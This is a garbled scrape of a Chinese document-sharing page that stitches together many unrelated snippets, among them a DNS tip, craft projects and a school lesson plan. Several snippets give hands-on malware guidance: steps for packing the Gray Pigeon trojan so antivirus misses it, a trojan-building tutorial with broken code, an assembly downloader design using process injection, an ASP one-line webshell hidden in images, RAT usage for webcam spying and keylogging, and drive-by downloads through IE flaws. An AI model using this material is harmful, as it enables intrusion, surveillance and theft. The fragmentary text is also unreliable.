制作免杀木马用工具更轻松等
制作免杀木马用工具更轻松等
制作免杀木马用工具更轻松Blovlg
木马如果不做免杀处理,很容易被杀毒软件清除,虽然现在木马免杀的方法有很多,但几乎每种免杀方法公布后,都逃不过杀毒软件的眼睛。今天要介绍的方法经过测试可以顺利逃过主流杀毒软件的查杀,希望可以给那些还在寻找免杀木马的朋友带来一点福音。
这里主要利用工具制作免杀木马,比较适合小菜,用到的工具有:1、Restorator.exe。2、MaskPE 2.0最终版.exe。3、RPolyCrypt.exe。4、SimplePack.exe。5、vmprotect.exe。这些工具在网上都可以找到。
我们拿著名的灰鸽子木马做实验,配置灰鸽子大家都会了吧,我这里用的是黑防版。配置完毕以后用Restorator.exe 打开,把HACKER部分的大写字母改成小写的,你可以多修改一些代码这样效果会更好一些,改完后保存退出,这一步骤是躲过杀毒软件的表面查杀。
打开MaskPE2.0最终版exe,点击“LoadFile”按钮,载入灰鸽子服务端后。直接点击“Make File”按钮输入生成的文件名如1.exe。
打开SimplePackexe,托动1.exe到界面中。选中“压缩
资源”复选框,然后点击“压缩”。
用RPolyCrypt.exe直接处理1.exe,默认设置不用改,直接点击左边的按钮就可以了。
最后打开vmproteot.exe,载入1.exe点击“Next”,的界面,点“Add>”再点“Next”弹出确定框,点击“OK”。直到最后要注意,把“Execute"C:\......"”这个复选框去掉,要不然的话,自己做的免杀鸽子就会在自己的机器上运行了,那样的话就惨了!
经过这样的一番加工,你的免杀版灰鸽子就完成了,而且绝对可以躲过最新的杀毒软件查杀,大家可以试试。告诫大家不要做坏事啊。另外免杀方法公布出来就离死不远了,我这里只是抛砖引玉,希望大家多实践找到一种自己的免杀方法。
如何访问被封锁的网站?李红
由于某种原因,电信的DNS封锁了国外的一些网址,所以不要用电信的DNS去解析域名,自己手动添加国外DNS 服务器地址。设置步骤如下:
1点击“开始/设置/控制面板/网络连接”,右击“宽带”下的自定义连接,选择“属性”,然后点击“网络”,再双击“Internet协议(TCP/IP)”,点“使用下面的DNS服务器
地址”,在“首选DNS服务器”和“备用DNS服务器”中分别填人两个国外DNS地址(例如151.203.0.85和
168.95.1.1),最后点击“确定”退出;
2最后重启电脑,打开浏览器,检查能否正常浏览普通的国内外网站,如果不行,重复上面的步骤,选择另外的国外DNS地址重新设置,直到浏览器能正常浏览普通的国内外网站为止。
远程管理特洛伊木马(RAT)病毒
远程管理特洛伊木马(RA T)病毒 远程管理特洛伊木马(rat)病毒 rats the world of malicious software is often pided into two types: viral and nonviral. viruses are little bits of code that are buried in other codes. when the “host” codes are executed, the viruses replicate themselves and may attempt to do something destructive. in this, they behave much like biological viruses. worms are a kind of computer parasite considered to be part of the viral camp because they replicate and spread from computer to computer. a s with viruses, a worm”s malicious act is often the very act of replication; they can overwhelm computer infrastructures by generating massive numbers of e-mails or requests for connections that servers can”t handle. worms differ from viruses, thou gh, in that they aren”t just bits of code that exist in other files. they could be whole files--an entire excel spreadsheet, for example. they replicate without the need for another program to be run. remote administration types are an example of another kind of nonviral malicious software, the trojan horse, or more simply trojan. the purpose of these programs isn”t replication, but to penetrate and control. that masquerade as one thing when in fact they are something else, usually something destructive. there are a number of kinds of trojans, including spybots, which report on the web sites a computer user visits, and keybots or keyloggers, which record and report the user
远控、木马
远控、木马?神马都是浮云! 供稿:VIRUSFREE 年初,中央电视台的《焦点访谈》专门介绍了黑客如何危害大众的事,给人的感觉是黑客软件在利益的趋势下,有愈演愈烈的趋势,而普通用户的电脑沦为黑客们的“肉鸡”,只有被人任意宰割的份了。 为什么会这样?这还得从黑客软件的原理说起。 黑客软件,也称远控软件,是一种特殊的软件,合法的用途是用于远程维护电脑,能增加工作效率、降低劳动成本,但在黑客手里,就演变成为控制用户电脑,盗窃用户电脑资源的后门,用户电脑一旦被植入这种东东,什么游戏装备、QQ密码、银行支付帐号、股票账户、机密文档,都会成为黑客的囊中之物,除此之外,若干台被控电脑还可以组成“僵尸”网络,成为犯罪分子攻击别人电脑网络或者运行系统的帮凶,所以,电脑被黑客控制是非常危险的事情。 有人要说了,我的电脑安装了杀毒软件,还有防火墙,难道就防不住这些黑客软件?! 是的,基于杀毒软件的工作原理,黑客们使用各种“免杀”技术,就能逃避杀软的查杀,达到入驻用户电脑的目的。他们为了达到长期霸占用户电脑的目的,还使用了随时更新远控端程序的技术,目的只有一个,让杀软永远发现不了它们。 无毒空间的诞生,基本是敲响了这类黑客软件的丧钟,其原因是,那些在杀软面前非常牛的“免杀”技术,在无毒空间面前无疑于自投罗网,无毒空间的工作原理跟黑客软件的“免杀”技术是完全相克的,所以,只要用户电脑的无毒空间还在正常工作,抓黑客软件、后门程序就如同“瓮中捉鳖”一样非常容易。 以下案例就显示无毒空间抓住各类黑客软件的样子。
首先试试灰鸽子这个经典的远控,我们将灰鸽子的最新版找来测试了一下,老版本就不一一试验了,从原理上看,都应该不在话下。 这个截图显示的是灰鸽子进入用户电脑的情形,我们为了测试这个木马,故意没有搭理它,如果第一时间就禁止这些可疑程序,我们也就看不到后面的精彩镜头了。 图1 重启电脑,当作不知道木马已经进入我们电脑的样子。
木马制作原理
启动C++Builder企业版,新建一个工程,添加三个VCL控件:一个是In ternet 页中的Server Socket,另两个是Fas tn et页中的NMFTP^ NMSMTPServer Socket 的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol 文件传输协议)和SMTP(Simple Mail Transfer Protocol 简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 Form 窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form 就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。 我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木 马在Win9x 的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service 的后台进程, 它可以运行在较高的优先级下, 可以说是非常靠近系统核心的设备驱动程序中的那一种。因此 , 只要将我们的程序在进程数据库中用RegisterServiceProcess ()函数注册成服务进程(Service Process )就可以了。不过该函数的声明在Borland 预先打包的头文件中没有,那么我们只好自己来声明这个位于中的鸟函数了。 首先判断目标机的操作系统是Win9x 还是WinNt: { DWORD dwVersion = GetVersion (); _str (), AnsiString (SystemPath+"\\\\" ).c_str (),FALSE ); .) { _str ()); _str ()); _str (); nsiLastChar ()!=\'\\\\\' ) _str (); _str (); uid ); ttributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges (hToken, FALSE, &tkp , 0 ,(PTOKEN_PRIVILEGE)SNULL, 0); .) { goto NextTime; .) { return; 1 ” 2” 0L. Y ............ #define DestNum 1000 =random(ItemWidth);
汇编制作木马
现在很多单位都采用单独的计算机来存放重要的涉密文件。然而如果涉密文件被盗,不仅会带来严重的经济损失,窃密者还可能逍遥法外。为了解决这个问题,我们需要对涉密文件采取某些措施:如绑定木马,在窃密者在得手后木马能自动执行,并记录下窃密者的相关信息,最后及时通知监控端。上面所采取的措施,我们称为网络跟踪技术。本文所要讲述的汇编木马,就经常应用在跟踪技术中。 举个例子:在一涉密.Doc文件中绑定一个.Exe木马。如果木马功能复杂,并且是在VC等编译环境下生成,那它的体积至少有几十K,再加上.Doc文件自身的数据量就非常可观了。一个大的.Doc文件会引起窃密者的怀疑,我们的跟踪也就达不到效果。因此,我们势必要设法在不影响最终目的的前提下,尽量减小木马文件的体积。办法可能不止一个,而我采用的是编写汇编木马的方式。当然,研究的平台都是在Windows2000以上的操作系统中。 Win32汇编木马设计思路 完整的汇编木马又称为“小马”,原因有两个:一是它体积小,只有几K;二是它的功能仅仅是反向连接攻击端,从攻击端下载并执行真正的功能复杂的木马(大马)。为了便于大家理解,本文将不关心“大马”的功能实现,重点是提出汇编木马的设计思路,并尽量从基础的角度进行讨论。 汇编木马的设计围绕4个重要的技术指标:体积小、防杀、突破防火墙与进程隐藏、拖动并执行“大马”, 下面逐一介绍: 1、体积小。常规木马大多用高级语言编写,在集成环境下编译生成。虽然
实现方便,但是生成的.Exe文件体积较大。对于汇编木马,我们采用Win32汇编来实现,使得.Exe文件体积控制在几K。 2、防杀。为了避免被诺顿、卡巴斯基、江民等主流杀毒软件所识别,木马文件一定要进行可靠的加壳处理。根据经验,一般我们选用最新的ASProtect,加壳后的.Exe文件生存能力一般比较强。如果需要,在必要的时候还可以手动修改文件特征码。 3、突破防火墙与进程隐藏。木马文件执行的时候需要与攻击端通信,必须访问网络。但不仅第三方的个人防火墙会阻拦你,现在Windows XP SP2也自带了软件防火墙。当“不可信任”的应用程序访问网络时,防火墙会报警。我的解决方法是:将网络通信部分的代码作为远程线程注入到防火墙“可信任”的进程中。这个“可信任”的进程一般是系统进程,也可以是IE。代码的注入,同时起到了进程隐藏的作用。 4、拖动并执行“大马”。这是汇编木马的核心功能,也是本文要重点举例讨论的内容。最终的监控、跟踪功能是在“大马”中实现的,它可以通过高级语言来实现,体积大小并没有什么限制。 Win32汇编基础 为了进行下面的讨论,Win32汇编是大家必须掌握的基础知识。Win32汇编生成的程序也是运行在Windows保护模式下的。我们可以通过下面几个方面去了解: 1、Win32ASM编译器 Win32ASM编译器最常用的有两种:Borland公司的Tasm5.0和Microsoft的Masm6.11及以上版本,两种编译器各有自己的优缺点,本文选用Microsoft
一句话木马图片制作(三种方法)
图片木马制作的三种方法Copy命令制作 1.asp内容: 打开cmd,数据一下命令:
此时打开两个jpg文件,相比: 且打开可以像一样显示图像。 把以下代码放入目标网站,即可按asp执行。<% #include files=””%> Uedit32(转载):
本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配: 'execute' /news1/,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:
2.一句话木马服务器端代码: <%execute request("value")%>(其他的一句话也行) 3.一句Script标签: 4. 调用图片后门代码: 工具:UltraEdit
16个生活中很实用的简单小制作
16个生活中很实用的简单小制作个生活中很实用的简单小制作16
1、自制羽毛球准备材料:空饮料瓶一只,泡沫水果网套两只,橡皮筋一根,玻璃弹子一只。制作过程:1.取250毫升空饮料瓶一只,将瓶子的上半部分剪下;2.将剪下的部分均分为8份,用剪刀剪至瓶颈处,然后,将每一份剪成大小一致的花瓣形状;3.将泡
沫水果网套套在瓶身外,用橡皮筋固定在瓶口处;4.将另一只泡沫水果网套裹住一粒玻璃弹子,塞进瓶口,塞紧并露出1厘米左右; 5.剪下半只乒乓球,将半球底面覆在瓶口上,四边剪成须状,盖住瓶口后用橡皮筋固定住。 6.美化修饰后,一只自制羽毛球完成了。用、自制香2羽毛球拍打一打,看看效果怎么样? 皂纸制作材料和工具:吸湿性较好的白纸,小块香皂,一支毛笔和一次性饮料罐。制作方法:
先把香皂切碎后放在罐里,盛上适量的水后把杯子放在炉上加热,等香皂融化,将白纸裁成火柴盒大小,一张张涂透皂液,再取出阴干就成了香皂纸。3、自制热气球1.首先我们用软纸裁出6~8个叶状的纸片。2.将它们对折并用胶水将它们的边粘在一起作成一个气球。3.用胶带将四根连线粘到气球
底部。用橡皮泥将线的另外一端固定在桌子上。4.尽量将电吹风的速度调的很慢。将吹风口向上对准底部的开口并且打开开关。气球会慢慢变大拉紧细线并且离开桌面。4、自制手电筒具体制作方法是:将一只废易拉罐(如露露饮料罐)起掉一头盖子,另一头用圆头榔头敲凹。用厚瓦楞纸板卷起两节一号电池,电池正极朝 上、负极朝下装入罐中。找一个合适的塑料盖(如神奇大大卷的盒盖正好可以扣在露露饮料罐
上),在盒盖中央挖一个圆形小洞,洞的大小以使灯泡插紧为宜。将灯泡底座插入小洞。取一段寻线两端剥去线皮,一端绕在灯座上,另一端从塑料盖侧面扎一个小孔穿出。将塑料盖盖在易拉罐上。检查一下,灯泡、电池是不是紧密接触。到这里一次性手电筒就做好了。使用时,用大拇指把从侧壁穿出的导
(完整word版)手工制作教案
《手工》校本课程计划与教案 授课教师:杨敏 授课对象:四年级学生 授课时间:每周五校本课程 手工方课程的开设是对课堂教学的补充和延伸,与课堂教学相比更具灵活性、可塑性,因而学生非常乐意参加。地方课程的开设,在于培养学生对美术的兴趣、爱好、增长知识、提高技能、丰富学生的课余文化生活,为今后培养美术人才起着积极推动的作用。现将本学期美术小组的活动安排制定如下: 一、活动目的 本学期开设的手工地方课程活动为一部分有特长爱好的学生提供一个展示个性才艺的机会和空间,使他们的一技之长得到充分的发挥和展示,以点带面,促进全校的美术活动。进一步了解美术的基本知识,提高学生的欣赏水平及创造能力。同时让学生在活动中体验创作的乐趣。 二、活动要求 1、组织学生按时参加活动,并保持室内清洁。 2、每周五下午第二节课开始活动,小组成员必须准时到达美术室。 3、美术小组成员应严格遵守纪律,不准在美术室大声喧哗,不准做与美术学习无关的事。 4、每次老师布置的作业,学生都应按时完成。 5、爱护美术教室内的设施和用品。 三、活动内容
1、以小组合作的形式进行平面剪贴和立体手工制作 2、卡纸和生活中的废旧物品均可作为创作材料 3、给学生自己创作作品的时间和空间。 4、欣赏优秀手工作品,开拓学生眼界。 5、及时用相机拍摄活动内容。(集体或个人) 四、定期举办美术比赛 举办美术展览,交流、回顾、总结学习成果,为同学们提供表现自己实力,增强自信心的舞台能起到意想不到的效果。教师要精心指导,严格把关。学生大胆构思,不拘一格,精心绘制,多出佳作,在校内展出以起到示范作用。 五、备注 附:教学进程和教案 博爱小学地方课程备课(填年度学期) 一、教学进程 有趣的吊饰 教学目标: 1、知识与技能:能表现物象的形态特征;运用剪、对折、粘贴制作吊饰;有目的的排列。 2、过程与方法: (1)在比较中,感受民间饰物造型、色彩、花纹特点; (2)在探索中学习吊饰的设计方法; (3)在“尝试运用”中掌握制作方法。
灰鸽子远程控制软件
灰鸽子远程控制软件 【实验内容】 灰鸽子木马是网络上常见的并且功能强大的远程后门软件。采用dll注入技术,开启服务程序,从而实现远程控制的目的。本实验以灰鸽子木马为例进行木马的制作、种植和攻击。实验原理】 木马,全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出先在希腊神话传说中。一般木马程序都是隐蔽的进程,不易被用户发现。计算机木马程序一般具有以下几个特征: 主程序有两个,一个是服务端,另一个是控制端。服务端需要在主机执行。 当控制端连接服务端主机后,控制端会向服务端主机发出命令。而服务端主机在接受命令后,会执行相应的任务。 灰鸽子是国内一款著名后门软件,是国内后门软件的集大成者。具有丰富而强大的功能、灵活多变的操作、良好的隐藏性。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 【实验环境】 本地主机(WindowsXP)、Windows实验台,灰鸽子客户端软件。 实验的网络拓扑如图3.5.8-8所示,实验目标需首先确定所在主机实验台IP地址,并根据实验步骤填写正确的IP地址进行实验。 Windows实验台 本地主机 图3.5.8-8 【实验步骤】 一、木马制作 启动实验台,并设置实验台的IP地址,以实验台为目标主机进行攻防试验。 (1)在学生客户端,下载木马制作程序,打开客户端程序(可能需退出安全程序),灰 鸽子客户端的操作界面如下图所示。
(2)首先需要配置服务程序。点击“配置服务程序”,出现如下图所示的界面。 图 3.5.8-10 (3)在“自动上线设置”里,填写上“IP通知http访问地址、DNS解析域名或固定IP”, 此时填写学生客户端IP地址,然后设置连接密码,如下图所示。 图 3.5.8-11 (4)为了保证服务端程序运行的隐蔽性,我们可以把“安装选项”里的“安装后自动删 除安装文件”选中;如下图所示。
黑客是如何给我们的系统种上木马的
相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为杀毒软件会把木马作为病毒的一种进行查杀。 操作步骤: 一、种植木马 现在网络上流行的木马基本上都采用的是C/S结构(客户端/服务端)。你要使用木马控制对方的电脑,首先需要在对方的的电脑中种植并运行服务端程序,然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。 二、使用木马 成功的给别人植入木马服务端后,就需要耐心等待服务端上线。由于黑洞2004采用了反连接技术,所以服务端上线后会自动和客户端进行连接,这时,我们就可以操控客户端对服务端进行远程控制。在黑洞2004下面的列表中,随便选择一台已经上线的电脑,然后通过上面的命令按钮就可以对这台电脑进行控制。下面就简单的介绍一下这些命令的意义。 文件管理:服务端上线以后,你可以通过“文件管理”命令对服务端电脑中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹,并且支持断点传输。简单吧? 进程管理:查看、刷新、关闭对方的进程,如果发现有杀毒软件或者防火墙,就可以关闭相应的进程,达到保护服务器端程序的目的。 窗口管理:管理服务端电脑的程序窗口,你可以使对方窗口中的程序最大化、最小化、正常关闭等操作,这样就比进程管理更灵活。你可以搞很多恶作剧,比如让对方的某个窗口不停的最大化和最小化。 视频监控和语音监听:如果远程服务端电脑安装有USB摄像头,那么可以通过它来获取图像,并可直接保存为MediaPlay可以直接播放的Mpeg文件;需要对方有麦克风的话,还可以听到他们的谈话,恐怖吧? 除了上面介绍的这些功能以外,还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能,操作都非常简单,明白了吧?做骇客其实很容易。 3隐藏
网页木马制作全过程(详细)
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中 “https://www.360docs.net/doc/a117393253.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的